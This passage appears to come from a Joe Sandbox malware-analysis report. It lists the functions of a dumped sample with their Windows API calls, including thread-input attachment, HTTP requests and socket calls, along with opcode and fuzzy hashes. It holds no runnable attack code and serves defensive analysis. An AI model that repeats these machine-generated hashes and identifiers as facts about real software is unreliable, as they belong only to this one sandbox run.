                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0093C869
                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 0093C874
                                                                                                                                                                                      • GetParent.USER32 ref: 0093C890
                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0093C893
                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0093C89C
                                                                                                                                                                                      • GetParent.USER32(?), ref: 0093C8B8
                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0093C8BB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                      • API String ID: 313823418-1403004172
                                                                                                                                                                                      • Opcode ID: a633549cd83d6dfb73d1b422903cfba9ea22e60e542fe753a4b243bfa73eeded
                                                                                                                                                                                      • Instruction ID: c1287950c68a99d93ccf5fe04e563d977faac4ade365f8c0c7ff89c1f9eccf3c
                                                                                                                                                                                      • Opcode Fuzzy Hash: a633549cd83d6dfb73d1b422903cfba9ea22e60e542fe753a4b243bfa73eeded
                                                                                                                                                                                      • Instruction Fuzzy Hash: EB21AFB5A01208AFDF00ABA4CC85EFEBBB9EF85300F104515F551E72D1EB789915AF20
                                                                                                                                                                                      Function 0093C8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetParent.USER32 ref: 0093C8D9
                                                                                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 0093C8EE
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0093C900
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0093C97B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                      • API String ID: 1704125052-3381328864
                                                                                                                                                                                      • Opcode ID: 9c9d43785805d28825ab04e17a07efdccdb87f766c09841f93fbf6d9ce9bb989
                                                                                                                                                                                      • Instruction ID: fc335387007f634e7112ccf67f23b924848848149563a6c953e439d6c89da28f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c9d43785805d28825ab04e17a07efdccdb87f766c09841f93fbf6d9ce9bb989
                                                                                                                                                                                      • Instruction Fuzzy Hash: C21106B6248716B9FA042B30AC0AEA677ACDB57724F210022F900B50D6FF6169115B50
                                                                                                                                                                                      Function 0094B05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0094B137
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ArraySafeVartype
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1725837607-0
                                                                                                                                                                                      • Opcode ID: 6a9f1c3f3032bbd5a9b59b25ef2f54d3133a9a4f9fe114a168cde8fe6a69d09d
                                                                                                                                                                                      • Instruction ID: b1218eea422df26f57afdee6e877549bddd10f7da55e8e4c0d0711249063542d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a9f1c3f3032bbd5a9b59b25ef2f54d3133a9a4f9fe114a168cde8fe6a69d09d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 85C19C75A0621ADFDB04CFA8C481FAEB7B4FF08315F20446AE615E7291D734EA81CB90
                                                                                                                                                                                      Function 00947212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00947226
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00947233
                                                                                                                                                                                        • Part of subcall function 0092234B: __woutput_l.LIBCMT ref: 009223A4
                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 0094725D
                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00947269
                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00947276
                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00947296
                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 009472A8
                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 009472B7
                                                                                                                                                                                      • LockResource.KERNEL32(?), ref: 009472C3
                                                                                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00947322
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1433390588-0
                                                                                                                                                                                      • Opcode ID: e063ea77d9a2a2c018f19865d045e89993cdfde5b6b1601d9db1c2e7a07b5f73
                                                                                                                                                                                      • Instruction ID: d275bff00cfcb33de07f1903913da18252a294091cac806fd35fa8749422cfa4
                                                                                                                                                                                      • Opcode Fuzzy Hash: e063ea77d9a2a2c018f19865d045e89993cdfde5b6b1601d9db1c2e7a07b5f73
                                                                                                                                                                                      • Instruction Fuzzy Hash: C531A17190925AABDF119FA0EC45EAFBBACFF05340F004415FD11D2251E774D950EBA4
                                                                                                                                                                                      Function 00944A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00944A7D
                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00943AD7,?,00000001), ref: 00944A91
                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00944A98
                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00943AD7,?,00000001), ref: 00944AA7
                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00944AB9
                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00943AD7,?,00000001), ref: 00944AD2
                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00943AD7,?,00000001), ref: 00944AE4
                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00943AD7,?,00000001), ref: 00944B29
                                                                                                                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00943AD7,?,00000001), ref: 00944B3E
                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00943AD7,?,00000001), ref: 00944B49
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2156557900-0
                                                                                                                                                                                      • Opcode ID: 93ab625c8034aee3bc0deba8136d11c602e4673436c076ce2018d58b566819c9
                                                                                                                                                                                      • Instruction ID: 3fef30370cb0cabc4e6472756c79abf9abc1fe2d7d48908a439dfdefcabb50d6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 93ab625c8034aee3bc0deba8136d11c602e4673436c076ce2018d58b566819c9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D319171A29204BFEB209F64EC88FAEB7AEEB54351F14C015F905D7290D7B4DE409BA0
                                                                                                                                                                                      Function 0097EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetClientRect.USER32(?), ref: 0097EC32
                                                                                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0097EC49
                                                                                                                                                                                      • GetWindowDC.USER32(?), ref: 0097EC55
                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0097EC64
                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0097EC76
                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 0097EC94
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 272304278-0
                                                                                                                                                                                      • Opcode ID: 9d00a41d32aa6ff717611c0e8f8d3843e799e81ebae8a6b66c67c527b0ff69ab
                                                                                                                                                                                      • Instruction ID: 58f5d6e06e135674d6376941364f3f20574d9a843578033c325032ce8903f41d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d00a41d32aa6ff717611c0e8f8d3843e799e81ebae8a6b66c67c527b0ff69ab
                                                                                                                                                                                      • Instruction Fuzzy Hash: CE215E31519208EFDB21AB64ED48FE97B76EF09321F108165FA66A51E1DB310941EF11
                                                                                                                                                                                      Function 0093D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • EnumChildWindows.USER32(?,0093DD46), ref: 0093DC86
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ChildEnumWindows
                                                                                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                      • API String ID: 3555792229-1603158881
                                                                                                                                                                                      • Opcode ID: ec5a380821d2916d093e45b899b77a02c5056f6a2ff6433d71d6ef0a56ea1816
                                                                                                                                                                                      • Instruction ID: 6bc4bcb4c6f67f034c9f25eb53649802bb11173f5cf331717b81e25d6088566b
                                                                                                                                                                                      • Opcode Fuzzy Hash: ec5a380821d2916d093e45b899b77a02c5056f6a2ff6433d71d6ef0a56ea1816
                                                                                                                                                                                      • Instruction Fuzzy Hash: DE91C530A0160AEACB0CDF64D4A1BEDFBB9FF45310F548519D85AA7195DF30A989CFA0
                                                                                                                                                                                      Function 009045A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009045F0
                                                                                                                                                                                      • CoUninitialize.OLE32(?,00000000), ref: 00904695
                                                                                                                                                                                      • UnregisterHotKey.USER32(?), ref: 009047BD
                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00975936
                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0097599D
                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009759CA
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                      • String ID: close all
                                                                                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                                                                                      • Opcode ID: 385894808c20cfc1bfd71904b7b1e22c53e1e54c5b52ca738ae0915828909663
                                                                                                                                                                                      • Instruction ID: 79543107862f57a6280a0f2e0a423126ee5a0e33b5ea502234797ace96a6f3f8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 385894808c20cfc1bfd71904b7b1e22c53e1e54c5b52ca738ae0915828909663
                                                                                                                                                                                      • Instruction Fuzzy Hash: 79916C75601602CFD719EF14C899F69F3B8FF55700F5182A9E50AA72A2DB30AD66CF10
                                                                                                                                                                                      Function 0091C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 0091C2D2
                                                                                                                                                                                        • Part of subcall function 0091C697: GetClientRect.USER32(?,?), ref: 0091C6C0
                                                                                                                                                                                        • Part of subcall function 0091C697: GetWindowRect.USER32(?,?), ref: 0091C701
                                                                                                                                                                                        • Part of subcall function 0091C697: ScreenToClient.USER32(?,?), ref: 0091C729
                                                                                                                                                                                      • GetDC.USER32 ref: 0097E006
                                                                                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0097E019
                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0097E027
                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0097E03C
                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0097E044
                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0097E0CF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                                                                                      • Opcode ID: 68e6119acee26a0c944515573b297aafa9e214812cf8547682fe4e4be68cf45c
                                                                                                                                                                                      • Instruction ID: 47f2765f8de04498e79688a3b8dc0a093ad34e1431b19917d7cdc3a7b120c2e7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 68e6119acee26a0c944515573b297aafa9e214812cf8547682fe4e4be68cf45c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E71E432508208DFCF21CF64CC84AEA7BB9FF49310F148669ED5A9A2A6D731CC81DB51
                                                                                                                                                                                      Function 00954C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00954C5E
                                                                                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00954C8A
                                                                                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00954CCC
                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00954CE1
                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00954CEE
                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00954D1E
                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00954D65
                                                                                                                                                                                        • Part of subcall function 009556A9: GetLastError.KERNEL32(?,?,00954A2B,00000000,00000000,00000001), ref: 009556BE
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1241431887-3916222277
                                                                                                                                                                                      • Opcode ID: 9d96efaa50e4d00207e72623740fb1fad5cf96707b4f89d5dc4b81840246c474
                                                                                                                                                                                      • Instruction ID: d3b3c3a126c3dbb79c51a80678d094d2101fd4f80f99ee3b0d7f56675f4e6e78
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d96efaa50e4d00207e72623740fb1fad5cf96707b4f89d5dc4b81840246c474
                                                                                                                                                                                      • Instruction Fuzzy Hash: DA418EB1501618BFEB12DF61CC89FFA77ACEF48319F10411AFE019A191E7749D889BA0
                                                                                                                                                                                      Function 0095BAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0099DBF0), ref: 0095BBA1
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0099DBF0), ref: 0095BBD5
                                                                                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0095BD33
                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0095BD5D
                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028,?,0099DBF0), ref: 0095BEAD
                                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,?,?,0099DBF0), ref: 0095BEF7
                                                                                                                                                                                      • CoTaskMemFree.OLE32(?,?,?,0099DBF0), ref: 0095BF14
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 793797124-0
                                                                                                                                                                                      • Opcode ID: 282c9e3e1edfe357dd5d066f1b8573e47d85c74ae4be05a05d5eb2290763afd0
                                                                                                                                                                                      • Instruction ID: 98b4c73891074155234aba28066b7cc89d3fa112b433b75021756b2aab7e8eff
                                                                                                                                                                                      • Opcode Fuzzy Hash: 282c9e3e1edfe357dd5d066f1b8573e47d85c74ae4be05a05d5eb2290763afd0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BF12975A00109EFCF04DFA5C884EAEB7B9FF89315F148559F905AB290DB31AE49CB90
                                                                                                                                                                                      Function 00959AC3 Relevance: 13.7, APIs: 9, Instructions: 220networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • select.WSOCK32 ref: 00959B38
                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00959B45
                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00959B6F
                                                                                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00959B90
                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00959B9F
                                                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 00959C0C
                                                                                                                                                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00959C51
                                                                                                                                                                                      • _memmove.LIBCMT ref: 00959D10
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast$_memmovehtonsinet_ntoaselect
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1718709218-0
